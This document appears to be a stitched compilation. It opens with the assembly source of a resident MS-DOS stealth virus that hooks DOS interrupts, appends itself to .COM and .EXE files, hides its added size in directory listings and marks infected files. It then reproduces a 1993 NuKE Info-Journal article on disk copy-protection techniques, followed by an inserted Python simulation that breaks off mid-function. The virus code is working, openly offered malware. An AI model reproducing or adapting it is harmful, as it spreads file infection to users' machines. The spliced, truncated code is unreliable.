                cld                             ;clear direction to +
                repne   movsb                   ;move us
                mov     ds,cx                   ;ds=0000
                cli                             ;disable ints
                mov     word ptr ds:[0084h],offset int21_handler ;hook int21
                mov     word ptr ds:[0086h],es
                mov     word ptr ds:[0070h],offset int1c_handler ;hook int1c
                mov     word ptr ds:[0072h],es
                mov     word ptr ds:[004ch],offset int13_handler ;hook int13
                mov     word ptr ds:[004eh],es
                sti                             ;enable ints
exit_mem:
                pop     ds                      ;restore 'em
                pop     di
                pop     si
                pop     dx
                pop     cx
                pop     bx
exit_com:
                cmp     word ptr cs:[buffer][bp],5A4Dh  ;.exe file?
                je      exit_exe_file           ;yupe exit exe file
                cmp     word ptr cs:[buffer][bp],4D5Ah  ;.exe file?
                je      exit_exe_file           ;yupe exit exe file
                push    cs                      ;fix cs=ds for .com
                pop     ds
                mov     bx,offset buffer        ;get first 3 bytes
                add     bx,bp                   ;fix delta
                mov     ax,[bx]                 ;move first 2 bytes
                mov     word ptr ds:[100h],ax   ;put em in the beginning
                inc     bx                      ;inc pointer
                inc     bx
                mov     al,[bx]                 ;get last of 3rd byte
                mov     byte ptr ds:[102h],al   ;put that in place
                pop     es
                pop     ds
                pop     word ptr cs:[ax_reg][bp] ;save ax elsewhere
                mov     ax,100h
                push    ax                      ;fake a CALL & RETN
                mov     ax,word ptr cs:[ax_reg][bp] ;put ax as normal
                retn                            ;link to 100h
exit_exe_file:
                mov     dx,ds                   ;get psp=ds seg
                add     dx,10h                  ;add 16 bytes to seg
                pop     es
                pop     ds
                pop     ax
                add     word ptr cs:[buffer+22][bp],dx  ;fix segments
                add     dx,word ptr cs:[buffer+14][bp]
                cli
                mov     ss,dx                   ;restore ss
                mov     sp,word ptr cs:[buffer+16][bp]  ;and sp
                sti
                jmp     dword ptr cs:[buffer+20][bp]    ;jmp to entry pt.
ax_reg          dd      0
bp_reg          dd      0
int13           dd      0
int1c           dd      0
int21           dd      0
;===============================================================================
; Int 13h Handler
;===============================================================================
int13_handler:
                cmp     ax,0abcdh               ;virus test
                je      int13_test              ;yupe
int13call:
                jmp     dword ptr cs:[int13]    ;original int13
int13_test:
                mov     bx,ax                   ;fix
                iret
;===============================================================================
; Int 1Ch Handler
;===============================================================================
int1c_handler:
                iret
;-------------------------------------------------------------------------------
; FCB Dir Stealth Routine (File Find)
;-------------------------------------------------------------------------------
fcb_dir:
                call    calldos21               ;get the fcb block
                test    al,al                   ;test for error
                jnz     fcb_out                 ;jmp if error
                push    ax                      ;save registers
                push    bx
                push    cx
                push    es
                mov     ah,51h                  ;get current psp
                call    calldos21               ;call int21
                mov     es,bx                   ;es=segment of psp
                cmp     bx,es:[16h]             ;psp of command.com?
                jnz     fcb_out1                ;no, then jmp
                mov     bx,dx                   ;ds:bx=fcb
                mov     al,[bx]                 ;1st byte of fcb
                push    ax                      ;save it
                mov     ah,2fh                  ;get dta
                call    calldos21               ;es:bx <- dta
                pop     ax                      ;get first byte
                inc     al                      ;al=ffh therefore al=ZR
                jnz     fcb_old                 ;if != ZR jmp
                add     bx,7h                   ;extended fcb here, +7
fcb_old:
                mov     ax,es:[bx+17h]          ;get file time stamp
                mov     cx,es:[bx+19h]          ;get file date stamp
                and     ax,1fh                  ;unmask seconds field
                and     cx,1fh                  ;unmask day of month
                xor     ax,cx                   ;are they equal?
                jnz     fcb_out1                ;nope, exit then
                sub     word ptr es:[bx+1dh],virus_size ;sub away virus_size
                sbb     word ptr es:[bx+1fh],0  ;sub with carry flag
fcb_out1:
                pop     es                      ;restore registers
                pop     cx
                pop     bx
                pop     ax
fcb_out:
                iret                            ;return control
;-------------------------------------------------------------------------------
; ASCIIZ Dir Stealth Routine (File Find)
;-------------------------------------------------------------------------------
dta_dir:
                call    calldos21               ;get results to dta
                jb      dta_out                 ;if error, split
                push    ax                      ;save registers
                push    bx
                push    cx
                push    es
                mov     ah,2fh                  ;get current dta
                call    calldos21               ;es:bx <- dta
                mov     ax,es:[bx+16h]          ;get file time stamp
                mov     cx,es:[bx+18h]          ;get file date stamp
                and     ax,1fh                  ;unmask seconds field
                and     cx,1fh                  ;unmask day of month
                xor     ax,cx                   ;are they equal?
                jnz     dta_out1                ;nope, exit then
                sub     word ptr es:[bx+1ah],virus_size ;sub away virus_size
                sbb     word ptr es:[bx+1ch],0  ;sub with carry flag
dta_out1:
                pop     es                      ;restore registers
                pop     cx
                pop     bx
                pop     ax
dta_out:
                retf    0002h                   ;far return, discarding the flags word
;===============================================================================
; Int 21h Handler
;===============================================================================
int21_handler:
                cmp     ah,11h                  ;FCB find first match
                je      old_dir
                cmp     ah,12h                  ;FCB find next match
                je      old_dir
                cmp     ah,4eh                  ;Find first match
                je      new_dir
                cmp     ah,4fh                  ;Find next match
                je      new_dir
                cmp     ah,3dh                  ;Opening a file
                je      file_open
                cmp     ah,6ch                  ;Ext_opening a file
                je      file_ext_open
                cmp     ah,3eh                  ;closing a file
                je      file_close
                cmp     ah,4bh                  ;Execution of a file
                je      file_execute
int21call:
                jmp     dword ptr cs:[int21]    ;original int21
old_dir:
                jmp     fcb_dir                 ;fcb file find
new_dir:
                jmp     dta_dir                 ;new asciiz file find
file_open:
                jmp     open_file               ;disinfect opening file
file_ext_open:
                jmp     open_ext_file           ;disinfect opening file
file_close:
                jmp     close_file              ;infect closing file
file_execute:
                call    check_extension         ;check for ok ext
                cmp     byte ptr cs:[com_ext],1 ;is it a com?
                je      exec_disinfect          ;yupe disinfect it
                cmp     byte ptr cs:[exe_ext],1 ;is it an exe?
                je      exec_disinfect          ;yupe disinfect it
                jmp     SHORT int21call
exec_disinfect:
                call    exec_disinfect1         ;Disinfect file
                mov     word ptr cs:[ax_reg],dx
                pushf                           ;fake an int
                call    dword ptr cs:[int21]    ;call dos
                xchg    word ptr cs:[ax_reg],dx ;restore dx
                mov     byte ptr cs:[close],0   ;reset flag..
                push    ax                      ;store 'em
                push    bx
                push    cx
                push    dx
                push    si
                push    di
                push    es
                push    ds
closing_infect:
                mov     ax,3524h                ;get error handler
                call    calldos21               ;call dos
                push    es                      ;save es:bx= int_24
                push    bx                      ;error handler
                push    ds                      ;ds:dx= asciiz string
                push    dx
                push    cs                      ;cs=ds
                pop     ds
                mov     dx,offset int21_handler ;hook error handler
                mov     ax,2524h                ;with our int24h
                call    calldos21
                pop     dx                      ;restore ds:dx asciiz
                pop     ds                      ;string
                cmp     byte ptr cs:[close],0   ;Are we closing file?
                je      exec_get_att            ;nope, then jmp
                mov     ax,word ptr cs:[handle] ;yupe, ax=file handle
                jmp     exec_open_ok            ;jmp so you don't open
                                                ;the file twice...
exec_get_att:
                mov     ax,4300h                ;get file attribs
                call    calldos21               ;call dos
                jnc     exec_attrib             ;no error? jmp
                jmp     exec_exit2              ;ERROR - split
exec_attrib:
                mov     byte ptr cs:[attrib],cl
                test    cl,1                    ;check bit 0 (read_only)
                jz      exec_attrib_ok          ;if bit0=0 jmp
                dec     cx                      ;else turn off bit_0
                mov     ax,4301h                ;write new attribs
                call    calldos21               ;call dos
exec_attrib_ok:
                mov     ax,3d02h                ;open file for r/w
                call    calldos21               ;call dos
                jnc     exec_open_ok            ;ok, no error jmp
                jmp     exec_exit2              ;ERROR - split
exec_open_ok:
                xchg    bx,ax                   ;bx=file handle
                push    cs                      ;cs=ds
                pop     ds
                mov     ax,5700h                ;get file time/date
                call    calldos21               ;call dos
                mov     word ptr cs:[old_time],cx ;save file time
                mov     word ptr cs:[org_time],cx
                mov     word ptr cs:[old_date],dx ;save file date
                and     cx,1fh                  ;unmask seconds field
                and     dx,1fh                  ;unmask day field
                xor     cx,dx                   ;are they equal?
                jnz     exec_time_ok            ;nope, file not infected
                jmp     exec_exit3              ;FILE INFECTED
exec_time_ok:
                and     word ptr cs:[old_time],0ffe0h ;reset second bits
                or      word ptr cs:[old_time],dx ;seconds=day of month
                mov     ax,4200h                ;reset ptr to beginning
                xor     cx,cx                   ;(as opened files may
                xor     dx,dx                   ; have ptr anywhere,
                call    calldos21               ; so be smart!)
                mov     word ptr cs:[marker],0DBDBh ;File Infection marker
                mov     dx,offset ds:[buffer]   ;ds:dx buffer
                mov     cx,18h                  ;read 18h bytes
                mov     ah,3fh                  ;read from handle
                call    calldos21               ;call dos
                jc      exec_exit1              ;error? if yes jmp
                sub     cx,ax                   ;did we read 18h bytes?
                jnz     exec_exit1              ;if no exit
                mov     dx,cx                   ;cx=0 dx=0
                mov     ax,4202h                ;jmp to EOF
                call    calldos21               ;call dos
                jc      exec_exit1              ;error? exit if so.
                mov     word ptr cs:[filesize+2],ax ;save lower 16bit fileSz
                mov     word ptr cs:[filesize],dx ;save upper 16bit fileSz
                call    chkbuf                  ;check if .exe
                jz      exec_cool               ;jmp if .exe file
                cmp     ax,0FFF0h - virus_size  ;.com + virus still under 64k-16?
                jb      exec_cool               ;if less jmp!
exec_exit1:
                jmp     exec_exit3              ;exit!
exec_cool:
                mov     dx,offset init_virus    ;ds:dx=virus beginning
                mov     cx,virus_size           ;cx=virus size
                mov     ah,40h                  ;write to handle
                call    calldos21               ;call dos
                jc      exec_exit1              ;error? if yes exit
                sub     cx,ax                   ;cx=ax bytes?
                jnz     exec_exit1              ;not equal exit
                mov     dx,cx                   ;cx=0 dx=0
                mov     ax,4200h                ;jmp to top of file
                call    calldos21               ;call dos
                jc      exec_exit1              ;error, then exit
                mov     ax,word ptr cs:[filesize+2] ;ax=lower 16bit fileSize
                call    chkbuf                  ;check if .exe
                jnz     exec_com_file           ;if !=.exe jmp
                mov     dx,word ptr cs:[filesize] ;get upper 16bit
                mov     cx,4                    ;cx=0004
                mov     si,word ptr cs:[buffer+8] ;get exe header size
                shl     si,cl                   ;mul by 16
                sub     ax,si                   ;filesize - exe_header
                sbb     dx,0h                   ;sub with carry
                mov     cx,10h                  ;cx=0010
                div     cx                      ;ax=length in para
                                                ;dx=remainder
                mov     word ptr cs:[buffer+20],dx ;New IP offset address
                mov     word ptr cs:[buffer+22],ax ;New CS (In paragraphs)
                add     dx,virus_size+100h      ;Dx=virus_size+256
                mov     word ptr cs:[buffer+16],dx ;New SP entry
                mov     word ptr cs:[buffer+14],ax ;New SS (in para)
                add     word ptr cs:[buffer+10],(virus_size)/16+1 ;min para
                mov     ax,word ptr cs:[buffer+10] ;ax=min para needed
                cmp     ax,word ptr cs:[buffer+12] ;cmp with max para
                jb      exec_size_ok            ;jmp if ok!
                mov     word ptr cs:[buffer+12],ax ;nope, enter new max
exec_size_ok:
                mov     ax,word ptr cs:[buffer+2] ;ax=file size mod 512
                add     ax,virus_size           ;add virus to it
                push    ax                      ;push it
                and     ah,1                    ;keep it mod 512
                mov     word ptr cs:[buffer+2],ax ;restore new value
                pop     ax                      ;pop ax
                mov     cl,9                    ;
                shr     ax,cl                   ;pages of 512 bytes
                add     word ptr cs:[buffer+4],ax ;enter fileSz + header
                mov     dx,offset buffer        ;ds:dx=new exe header
                mov     cx,18h                  ;cx=18h bytes to write
                jmp     SHORT exec_write_it     ;jmp...
exec_com_file:
                sub     ax,3                    ;sub 3 for jmp address
                mov     word ptr cs:[buffer+1],ax ;store new jmp value
                mov     byte ptr cs:[buffer],0E9h ;E9h=JMP
                mov     dx,offset buffer        ;ds:dx=buffer
                mov     cx,3                    ;cx=3 bytes
exec_write_it:
                mov     ah,40h                  ;write to file handle
                call    calldos21               ;call dos
                mov     dx,word ptr cs:[old_date] ;restore old date
                mov     cx,word ptr cs:[old_time] ;restore old time
                mov     ax,5701h                ;write back to file
                call    calldos21               ;call dos
exec_exit3:
                mov     ah,3eh                  ;close file
                call    calldos21               ;call dos
exec_exit2:
                pop     dx                      ;restore es:bx (the
                pop     ds                      ;original int_24)
                mov     ax,2524h                ;put back to place
                call    calldos21               ;call dos
                pop     ds
                pop     es
                pop     di                      ;pop registers
                pop     si
                pop     dx
                xor     cx,cx
                mov     cl,byte ptr cs:[attrib] ;get old file attrib
                mov     ax,4301h                ;put them back
                call    calldos21               ;call dos
                pop     cx
                pop     bx
                pop     ax
                cmp     byte ptr cs:[close],0   ;got called by exec?
                je      exec_good_bye           ;yep, then jmp
                iret                            ;else exit now.
exec_good_bye:
                mov     dx,word ptr cs:[ax_reg] ;restore dx
                iret                            ;iret
;-------------------------------------------------------------------------------
; Close File Int21h/ah=3Eh
;-------------------------------------------------------------------------------
close_file:
                cmp     bx,4h                   ;file handle > 4?
                ja      close_cont              ;jmp if above
                jmp     int21call               ;else exit
close_cont:
                push    ax                      ;save 'em
                push    bx
                push    cx
                push    dx
                push    si
                push    di
                push    es
                push    ds
                push    bx                      ;save file handle
                mov     ax,1220h                ;get job file table!
int 2fh ;call multiplex ;es:di=JFT for handler mov ax,1216h ;get system file table mov bl,es:[di] ;bl=SFT entry int 2fh ;call multiplex pop bx ;save file handler add di,0011h mov byte ptr es:[di-0fh],02h ;set to read/write add di,0017h cmp word ptr es:[di],'OC' ;check for .COM file jne closing_next_try ;no try next ext cmp byte ptr es:[di+2h],'M' ;check last letter je closing_cunt3 ;no, file no good, exit closing_exit: jmp closing_nogood ;exit closing_next_try: cmp word ptr es:[di],'XE' ;check for .EXE file jne closing_exit ;no, exit cmp byte ptr es:[di+2h],'E' ;check last letter jne closing_exit ;no, exit closing_cunt3: mov byte ptr cs:[close],1 ;set closing flag mov word ptr cs:[handle],bx ;save handler jmp closing_infect ;infect file! closing_nogood: pop ds ;restore 'em pop es pop di pop si pop dx pop cx pop bx pop ax jmp int21call ;good bye, baby... ;------------------------------------------------------------------------------- ; Execute Disinfecting routine ;------------------------------------------------------------------------------- exec_disinfect1 PROC push ax ;save registers push bx push cx push dx push ds mov ax,4300h ;get file attribs call calldos21 ;call dos test cl,1h ;is Read-only flag? jz okay_dis ;no, jmp attribs ok dec cx ;turn off bit 0 mov ax,4301h ;write new attribs call calldos21 ;call dos jnc okay_dis ;No error? then jmp jmp end_dis ;error? exit! okay_dis: mov ax,3d02h ;open file for r/w call calldos21 ;call dos jnc dis_fileopen ;No error? then jmp jmp end_dis ;Error? exit! dis_fileopen: xchg bx,ax ;bx=file handle mov ax,5700h ;get file time/date call calldos21 ;call dos mov word ptr cs:[old_time],cx ;save file time mov word ptr cs:[old_date],dx ;save file date and cx,1fh ;unmask second field and dx,1fh ;unmask date field xor cx,dx ;are they equal? 
jnz half_way ;nope, file not infected mov ax,4202h ;jmp to EOF xor cx,cx ;cx=0 xor dx,dx ;dx=0 call calldos21 ;call dos push cs ;cs=ds pop ds ; mov cx,dx ;dx:ax=file size mov dx,ax ;save to cx:dx push cx ;save upper fileSz push dx ;save lower fileSz sub dx,1Ch ;filesize-1C=origin byte sbb cx,0 ;sub with carry mov ax,4200h ;position ptr call calldos21 ;call dos mov ah,3fh ;open file mov cx,1Ch ;read last 1Ch bytes mov dx,offset org_time ;put in ds:dx call calldos21 ;call dos call chkbuf ;Did it work? je half ;Yes,Jmp cmp word ptr ds:[marker],0DBDBh ;File REALLY Infected? je half ;Yes, then jmp pop dx pop cx half_way: jmp end_dis1 ;exit, error! half: xor cx,cx ;cx=0 xor dx,dx ;dx=0 mov ax,4200h ;pointer to top of file call calldos21 ;call dos mov ah,40h ;write function mov dx,offset buffer ;ds:dx=buffer mov cx,18h ;cx=18h bytes to write call chkbuf ;check if .exe? jz SHORT dis_exe_jmp ;yupe, jmp mov cx,3h ;else write 3 bytes dis_exe_jmp: call calldos21 ;call dos pop dx ;pop original fileSz pop cx sub dx,virus_size ;Sub with virus_size sbb cx,0 ;sub with carry mov ax,4200h ;ptr top of virus call calldos21 ;call dos mov ah,40h ;write function xor cx,cx ;write 0 bytes call calldos21 ;call dos! 
(new EOF) mov cx,word ptr ds:[org_time] ;get original time mov dx,word ptr ds:[old_date] ;get original date mov ax,5701h ;put back to file call calldos21 ;call dos end_dis1: mov ah,3eh ;close file handle call calldos21 ;call dos end_dis: pop ds ;restore values pop dx pop cx pop bx pop ax ret exec_disinfect1 ENDP ;------------------------------------------------------------------------------- ; Open File by DOS Int21h/ah=6ch ;------------------------------------------------------------------------------- open_ext_file: push dx ;save DX mov dx,si ;asciiz=DS:DX now jmp open_ext ;jmp ;------------------------------------------------------------------------------- ; Open File by DOS Int21h/ah=3Dh ;------------------------------------------------------------------------------- open_file: push dx ;save dx (asciiz) open_ext: call check_extension ;check extension cmp byte ptr cs:[com_ext],1 ;is it a .com? je open_ok_ext ;yep, then jmp cmp byte ptr cs:[exe_ext],1 ;is it a .exe? je open_ok_ext ;yep, them jmp jmp open_exit ;ext no good, exit! open_ok_ext: call exec_disinfect1 ;disinfect file! open_exit: pop dx ;restore dx jmp int21call ;exit to dos... ;------------------------------------------------------------------------------- ; Checks Buffer (EXE) Header ;------------------------------------------------------------------------------- chkbuf PROC push si ;save register mov si,word ptr cs:[buffer] ;get first word cmp si,5A4Dh ;si=ZM? je chkbuf_ok ;if yes exit cmp si,4D5Ah ;si=MZ? chkbuf_ok: pop si ;pop register ret chkbuf ENDP ;------------------------------------------------------------------------------- ; Check file Extension ;------------------------------------------------------------------------------- check_extension PROC pushf ;save flags push cx ;save cx,si push si mov si,dx ;ds:[si]=asciiz mov cx,128 ;scan 128 bytes max mov byte ptr cs:[com_ext],0 ;reset .com flag mov byte ptr cs:[exe_ext],0 ;reset .exe flag check_ext: cmp byte ptr ds:[si],2Eh ;scan for "." 
je check_ext1 ;jmp if found inc si ;else inc and loop loop check_ext ;loop me check_ext1: inc si ;inc asciiz ptr cmp word ptr ds:[si],'OC' ;is it .COM jne check_ext2 ; ~~ cmp byte ptr ds:[si+2],'M' ;is it .COM je com_file_ext ; ~ check_ext2: cmp word ptr ds:[si],'oc' ;is it .com jne check_ext3 ; ~~ cmp byte ptr ds:[si+2],'m' ;is it .com je com_file_ext ; ~ check_ext3: cmp word ptr ds:[si],'XE' ;is it .EXE jne check_ext4 ; ~~ cmp byte ptr ds:[si+2],'E' ;is it .EXE je exe_file_ext ; ~ check_ext4: cmp word ptr ds:[si],'xe' ;is it .exe jne check_ext_exit ; ~~ cmp byte ptr ds:[si+2],'e' ;is it .exe je exe_file_ext ; ~ jmp check_ext_exit ;neither exit com_file_ext: mov byte ptr cs:[com_ext],1 ;found .com file jmp SHORT check_ext_exit ;jmp short exe_file_ext: mov byte ptr cs:[exe_ext],1 ;found .exe file check_ext_exit: pop si ;restore pop cx popf ;save flags ret com_ext db 0 ;flag on=.com file exe_ext db 0 ;flag on=.exe file check_extension ENDP ;------------------------------------------------------------------------------- ; Original Int21h ;------------------------------------------------------------------------------- calldos21 PROC pushf ;fake int call call dword ptr cs:[int21] ;call original int_21 ret calldos21 ENDP ;=============================================================================== ; Int 24h Handler ;=============================================================================== int24_handler: mov al,3 ;don't report error... iret ;later dude... 
;------------------------------------------------------------------------------- ; FLAGS - FLAGS - FLAGS - FLAGS - FLAGS close db 0 ;closing file ;------------------------------------------------------------------------------- ; END - END - END - END - END - END - END flags dw 0 ;Flags are saved here attrib db 0 ;file's attrib filesize dd 0 ;filesize handle dw 0 ;file handler old_date dw 0 ;file date old_time dw 0 ;file time org_time dw 0 ;original file time ;------------------------------------------------------------------------------- buffer db 0CDh,020h ; 0 (0) EXE file signature db 090h,090h ; 2 (2) Length of file db 090h,090h ; 4 (4) Size of file + header (512k) db 090h,090h ; 6 (6) # of relocation items db 090h,090h ; 8 (8) Size of header (16byte para) db 090h,090h ; A (10) Min para needed (16byte) db 090h,090h ; C (12) Max para needed (16byte) db 090h,090h ; E (14) SS reg from start in para. db 090h,090h ; 10(16) SP reg at entry db 090h,090h ; 12(18) checksum db 090h,090h ; 14(20) IP reg at entry db 090h,090h ; 16(22) CS reg from start in para. Marker db 0DBh,0DBh ; Marks THIS File as INFECTED! last: seg_a ends end start

================================================================================
================================================================================

Volume 1, Issue 6, May 1993                              NuKE Info-Journal #6

"The Arms Race on Disk-Based Protection Methods : Round One"
By Rock Steady

% The `Arms Race' on Disk-Based Copy Protection Methods : Round One %

Disk-based techniques of protecting software have existed since the early days of microcomputers. The very first microcomputers used cassette tapes to store programs and data. (Remember the C-64's old days?) The first mass-market microcomputer to use disk drives instead of cassette tapes was the Apple-II in 1978.
Its great popularity was largely due to its reliable and inexpensive disk drive system, devised by Steve Wozniak. The disks, much faster and more convenient than cassettes, in turn made it practical to run large and complex programs. Disks became standard equipment on all but the cheapest microcomputers. The tremendous success of the IBM PC microcomputer in the early 1980s confirmed this trend.

The history of disk-based protection methods, and of the efforts to defeat them, resembles an escalating arms race, hence the name. Early, elementary protection techniques were countered by skilled users; some did it for their own convenience, others for the intellectual challenge. And so the arms race began. The `guerrillas' of the arms race were the `software hackers', whose mission was to devise a method for removing (`cracking') the copy-protection of each new program marketed, and who then distributed the copyable version to their friends, who passed it on, and so on.

I have witnessed, and was quite an active member of, this arms race; the intellectual challenge was the main reason for my membership. During the years I have come upon several protection techniques, some of which I was able to easily bypass, and others that presented a great challenge. Slowly I began noting the several methods of disk-based copy-protection, and I also acquired several documents on other disk-based copy-protection methods, and today you will read about this very interesting concept of disk-based copy-protection. Some methods were quite frightening, as they tried to perform dangerous disk-access techniques. Some methods were quite trivial; others exploited loops and flaws in the disk structures and in how the disk controller reacts. All the methods I was able to collect are documented below; a lot of time and effort was put into this, and I do hope you appreciate it.

% Disk Format %

The early generation of disk protection methods depended on technical details of the diskette and disk drives.
To describe the methods, it is first necessary to outline the structure of a formatted floppy. For convenience I will only use the IBM PC 5.25 inch disk, formatted by the popular PC-DOS or MS-DOS.

Information is stored on the disk in a series of concentric circles, called `tracks'. In a normal 5.25 inch double density disk you have 40 such circles, aka tracks. Tracks are numbered from 0, the outermost track, to 39, the innermost. Each track is divided into 9 arcs, called `sectors', numbered from 0-8. Each sector consists of an `address field', which identifies the sector, and a `data field', which contains the data stored in that sector. Both fields contain a prologue, the data, a checksum of the information stored in that field, and an epilogue. Therefore, in reality DOS does NOT make the total number of possible bytes available for your data storage. In a 5.25 DSDD (double sided, double density) disk there is really a possible 500k, of which only 360k is available to you. In a 5.25 DSHD (double sided, high density) disk there is 1.6 Megs, but only 1.2 Megs is available to you. In a 3.5 DSDD disk there is 1 Meg, but 720k is available to you. In a 3.5 DSHD disk there is an amazing 2.0 Megs, but only 1.44 Megs is available to you.

The same applies to hard drives: ever buy a HD that says 120 Megs, but when you format it you only get 114 Megs? It's because of DOS. There are some programs that enable you to use this space and get rid of the address field that is present before _every_ sector. One popular program is called "MAXI - Form" by Herne Data Systems Ltd. This program allows a 360k floppy to hold 420k, 720k -> 810k, 1.2M -> 1.44M, 1.44M -> 1.66M. Maxi CANNOT make use of ALL the possible number of bytes, because we MUST reserve some space for the Boot Sector, 2 copies of the FAT and the DIR structures. However it does get rid of the address fields, and is compatible with DOS with the help of a TSR program that `fools' DOS into thinking that the disk was structured correctly.
Now, when you `boot' off a diskette, a copy of DOS _MUST_ reside on the outer few tracks of the disk. Another track is reserved for the file directory. When the computer is turned on, a process occurs called `booting'. The IBM PC does not contain a built-in DOS. Its ROM contains just enough information to enable it to find and read sector 0 of track 0 of the disk, which is the boot sector. That sector contains a program to read a few more sectors, which in turn contain a program to read the entire DOS into memory.

% Sector Format %

The majority of floppy disks are `soft-sectored', meaning that the software must be able to locate any given track and sector with no help from the hardware. On `hard-sectored' disks there is a physical marker, such as a small index hole, that tells the hardware precisely where each track and sector is physically located. On a soft-sectored disk the software searches for the desired sector by a trial-and-error process, reading sector address fields until it finds the sector it wants. This certainly takes a little longer, but allows much more flexibility, since the sectors may be placed anywhere the DOS likes. Anyhow, floppies are usually soft-sectored, but IBM 5.25 inch and 3.5 inch diskettes contain physical markers. Hard disks usually tend to be soft-sectored, but that was only on the MFM and RLL hard drives; the IDE and SCSI drives are hard-sectored, and that is why we have a _major_ difference in access time: MFM and RLL range at 50-70ms (milliseconds), while IDE and SCSI tend to range from 8-15ms.

% Copy-protection Method #1 : Disk Appearance %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

% Unformatted Tracks %

The simplest protection against disk copier utilities was to include a blank (unformatted) track or sector on the disk. The disk copy utility will fail at that track and copy nothing further. This was probably the first kind of whole-disk copy protection introduced.
% Non-standard DOSes %

Although the disk cannot be copied, it will still boot and run properly as long as the DOS does not attempt to access the unformatted track. This can easily be ensured by using a modified version of the normal DOS. When a disk is booted, the DOS on the disk replaces any that may have been in RAM. It can have any modifications the author pleases. The only requirement is that the modifications to the DOS must correlate with the modifications to the disk format. Some of these methods are listed below.

a) Altered track/sector count

The number of tracks per disk and sectors per track are usually chosen to provide maximum data storage per disk. There is no reason why lesser numbers cannot be used. For example we could create an IBM disk with only 7 sectors per track or 30 tracks per disk. And with a slightly more complex DOS modification the number of sectors could vary from track to track.

b) Altered sector size

A normal sector on an IBM PC disk always contains 512 bytes of user data as its payload. It is easy to alter the DOS to expect a different number of bytes per sector. In some cases, huge sectors have been used that fill an entire track.

c) Altered track/sector numbering

Each sector on a disk has an address field containing its track number and sector number. The DOS checks this before reading the track. Instead of numbering the sectors on a track from 0 to 9, one could number them from 70 to 79. The 40 tracks, likewise, could have bizarre numbering, say the first 40 prime numbers.

d) Altered checksums

Each sector contains a byte which is a checksum of the data contained in that sector. It is calculated by performing an eXclusive-OR (XOR) operation across all the bytes in the sector. The DOS recalculates the checksum each time it reads a sector, and compares its value to the one actually stored in the sector. If they differ, the DOS assumes that it read some byte(s) in the sector incorrectly.
One can protect a disk by using a different algorithm for calculating the checksum to be stored in each sector. Of course the disk's own DOS uses the same algorithm, and so agrees with the stored checksums, but standard DOS thinks it has read each sector incorrectly, and will retry up to 5 times; once all 5 tries fail it will report the "Bad CRC Data...." error message.

e) Half-Tracks

The newer half-height floppy drives were quite advanced; as a matter of fact they were capable of stepping to positions half-way between the normal track positions. These half-track positions are not ordinarily suitable for recording data, because they are so close to the normal tracks that there would be crosstalk (meaning signals would spill over from the normal tracks to the half-tracks and vice-versa). On the other hand, the half-tracks can be used if the normal tracks are left unused. For instance a disk could use tracks 0, 1.5, 2.5, 4, 5, etc. A normal copy program will miss all the half-tracks.

% Nibble Copy Programs Fight Back %

In response to the above protection techniques, computer hobbyists began to write and circulate special copy programs known as `Nibble Copiers'. These were passed gratis along the grapevine of hobbyists. The first commercially advertised bit copier was `Locksmith' by Omega Microware of Chicago, at around 1984. The first version of Locksmith was slow but reliable, and was able to cope quite easily with all the copy-protection methods described above. Within a year other companies' programs appeared, like Copy-Write, Copy-II-PC and E.D.D., but Locksmith remained the most prominent until Omega Microware collapsed near 1985-86.

A bit copier makes as few assumptions as possible about the format of the disk. It does not assume any particular number of sectors per track or tracks per disk, or any other possible sector alteration. This is something DOS was never able to do.
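Items (c) and (d) above, together with the soft-sectored search described under Sector Format, as an added Python example that is not part of the article: a toy track image with address and data fields, a DOS-style sector search, and the 5-retry read that fails when the disk was written with a checksum algorithm other than the plain XOR. The field markers, field sizes, the gap filler and the `rotated' checksum are all constructed assumptions, not the real MFM layout.

```python
"""Toy model of one soft-sectored floppy track: each sector is an address
field plus a data field, every field carries a one-byte checksum, and the
reader locates a sector by scanning address fields (no hardware help).
Constructed example, not the article's code; the marker bytes, field sizes,
gap filler and the `rotated' checksum are assumptions for illustration and
not the real MFM encoding."""

ADDR_PROLOGUE = b"\xA1\xFE"   # assumed start-of-address-field marker
DATA_PROLOGUE = b"\xA1\xFB"   # assumed start-of-data-field marker
EPILOGUE = b"\xDE\xAA"        # assumed end-of-field marker
GAP = b"\x4E" * 40            # assumed filler between sectors
SECTOR_SIZE = 512             # user payload per sector, as in the article
MAX_RETRIES = 5               # standard DOS retry count quoted in the article


def xor_checksum(data: bytes) -> int:
    """Standard checksum: XOR across every byte of the field."""
    c = 0
    for b in data:
        c ^= b
    return c


def rotated_checksum(data: bytes) -> int:
    """Non-standard checksum a protected disk's own DOS might use: the
    running value is rotated left one bit before each byte is XORed in."""
    c = 0
    for b in data:
        c = ((c << 1) | (c >> 7)) & 0xFF
        c ^= b
    return c


def build_field(prologue: bytes, payload: bytes, checksum) -> bytes:
    return prologue + payload + bytes([checksum(payload)]) + EPILOGUE


def build_track(track_no, sectors, data_checksum=xor_checksum) -> bytes:
    """Lay sectors down in the order given (any numbering, any interleave).
    Address fields always use the standard XOR; only the data-field
    checksum algorithm is selectable, mirroring item (d) above."""
    image = bytearray()
    for sector_no, data in sectors:
        assert len(data) == SECTOR_SIZE
        image += build_field(ADDR_PROLOGUE, bytes([track_no, sector_no]), xor_checksum)
        image += build_field(DATA_PROLOGUE, data, data_checksum)
        image += GAP
    return bytes(image)


def next_field(image: bytes, pos: int, prologue: bytes):
    """Offset of the byte after the next prologue at or past pos, or None."""
    i = image.find(prologue, pos)
    return None if i < 0 else i + len(prologue)


def read_sector(image, want_track, want_sector, data_checksum=xor_checksum):
    """Soft-sector search: read address fields one after another until the
    wanted (track, sector) turns up, then verify its data field.
    Returns (payload, error); error is None on success."""
    pos = 0
    while True:
        pos = next_field(image, pos, ADDR_PROLOGUE)
        if pos is None:
            return None, "sector not found"
        track, sector, stored = image[pos], image[pos + 1], image[pos + 2]
        if xor_checksum(bytes([track, sector])) != stored:
            continue                      # unreadable address field: keep scanning
        if (track, sector) != (want_track, want_sector):
            continue
        dpos = next_field(image, pos, DATA_PROLOGUE)
        if dpos is None:
            return None, "data field missing"
        payload = image[dpos:dpos + SECTOR_SIZE]
        if data_checksum(payload) != image[dpos + SECTOR_SIZE]:
            return None, "checksum mismatch"
        return payload, None


def dos_read(image, track, sector, data_checksum=xor_checksum):
    """Read with the standard DOS behaviour: retry a checksum failure up to
    MAX_RETRIES times, then give up with the error (the "Bad CRC" case)."""
    err = None
    for _ in range(MAX_RETRIES):
        payload, err = read_sector(image, track, sector, data_checksum)
        if err is None:
            return payload, None
        if err != "checksum mismatch":
            break
    return None, err


def make_sample_track(data_checksum=xor_checksum) -> bytes:
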